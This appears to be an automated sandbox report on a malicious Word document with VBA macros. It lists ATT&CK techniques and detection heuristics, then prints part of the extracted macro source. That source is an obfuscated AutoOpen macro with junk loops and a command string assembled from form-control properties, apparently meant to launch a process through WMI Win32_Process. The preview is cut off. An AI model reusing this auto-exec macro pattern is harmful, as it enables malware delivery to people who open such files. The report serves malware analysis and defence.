Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1190 Exploit Public-Facing Application
The sample is a malicious Office document containing VBA macros. The macros run from an AutoOpen handler and use GetObject to reach WMI, specifically the Win32_Process class, which is used to create processes. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Sagent-6971199-0' further supports the malicious verdict.
Heuristics (8)
- ClamAV: Doc.Malware.Sagent-6971199-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6971199-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN)
- GetObject call (high, OLE_VBA_GETOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7954 bytes |

SHA-256 of macros.bas: 9b8d702396a50184e0d4c8678068c6d9669caf77c485ce0886656f624034302f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "U7__0_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "E15741"
Attribute VB_Base = "0{385981A0-4F92-4FC0-B53A-3F985D0E0E8D}{06DEAA44-9530-4C6C-B3CE-EC724C705645}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "l393667"
Attribute VB_Name = "F9065_1"
Attribute VB_Base = "0{A57093E9-F0B8-4071-B174-B42496A92819}{58E5F28B-A7F4-402E-A3D7-D2E8A964EF30}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "J066_7_9"
Function i32_09(i2962_8)
While U5697_8 And X170170_
_
_
_
'r64934Q5_8742_E6045383r827295
'd367_5p54817_0c212_9f4460_
_
_
_
_
'W880__74M8922946z538_996f47324
Wend
While X4_14227 And c3__8958
_
_
_
'f6723_1W_8__10P179416m543_2
'z90942u00410F56902i03623_
_
_
_
_
'p1107_j63841N278940K50918
Wend
Set i32_09 = CVar(i2962_8)
While j44183 And D607075
_
_
_
'O_49_773f4_489_0c438309G6306_35
'n8087341t_9814i629_3_3b55472_
_
_
_
_
'k7509852b9216997j850_780h82832
Wend
While U8061626 And j830889
_
_
_
'H3260166J190792r652582N35619
'P3156_5V0982773n28982b_81_3
_
_
_
_
'w2246_1O27270X068544u334_787
Wend
While W60917 And V4192007
_
_
_
'q_90805i3__3419U16160_G47836
'U70141j65051N65403C1942686
_
_
_
_
'j3_41_s5710146F23272_3H39_135
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While c23943_ And E6597021
_
_
_
'r666_5s744_08m400180D584536
'z184459X977256W2908045a3100482
_
_
_
_
'A61_350M40_610R9__01W_8353
Wend
While Z742_8 And V399362
_
_
_
'r12642i6_85719t8885_2K463887
'J625434p_88151X28259b23410_5
_
_
_
_
'R55553f_6423H6_115_F_492936
Wend
While L07923_6 And A__77_9
_
_
_
'w51477i55_289w417411W29428
'B437121E55033z53784d2_05493
_
_
_
_
'Y5002__1H3309123T_396129j3269752
Wend
Call S8931_
While m4946477 And w51656
_
_
_
'w4582833I1060493M3737231z907085
'E13106X698359i22_6239L48309_
_
_
_
_
'z3991897n5112_4_v141251r_35_6
Wend
While Y784536_ And s38_8679
_
_
_
'Y5094371w1_4543_Z33_59o67915
'n01386r94575F633305P355216
_
_
_
_
'f5_651H76385i73_0056L788993
Wend
End Sub
Attribute VB_Name = "i7131190"
Function S8931_()
On Error Resume Next
While r7483213 And B__0_88
_
_
_
'u837283A390_52X64292_8v436__
'f121_6G72_79L729_276m1990_
_
_
_
_
'Z19579w467726T97365r9854935
Wend
While D503377 And v4531452
_
_
_
'i816776Z4763048s466687i_8288
'B_478580p3497_9F279_7w03007_
_
_
_
_
'J9209814o0485866I4_4_91w75699_
Wend
D87232 = E15741.C05431.PasswordChar + F9065_1.G191_494 + E15741.C05431.ControlTipText + F9065_1.S2970591 + E15741.C05431.ControlTipText + E15741.C05431 + F9065_1.K_0_9655 + E15741.C05431.ControlSource + E15741.C05431.ControlSource + F9065_1.A5894_3 + E15741.C05431.ControlTipText + F9065_1.r87925 + E15741.C05431.ControlSource
While f082232 And c3552_
_
_
_
'r56_0807W825_0B42642N131347
'P45930E8__247u48414T95802
_
_
_
_
'K8644958V47297T36_3_t110370
Wend
While d831309 And w4_3072
_
_
_
'O4003594W60_02_4N0_469J3640041
'Z93_5_20F2_40_7b553123j17963
_
_
_
_
'n45_388D42603_P16203H10478
Wend
While E94356 And i935800
_
_
_
'm92867p91_420h822_960L0733835
'a734979T759_33o1701997m319433
_
_
_
_
't45_331F7118377Y663446
... (truncated)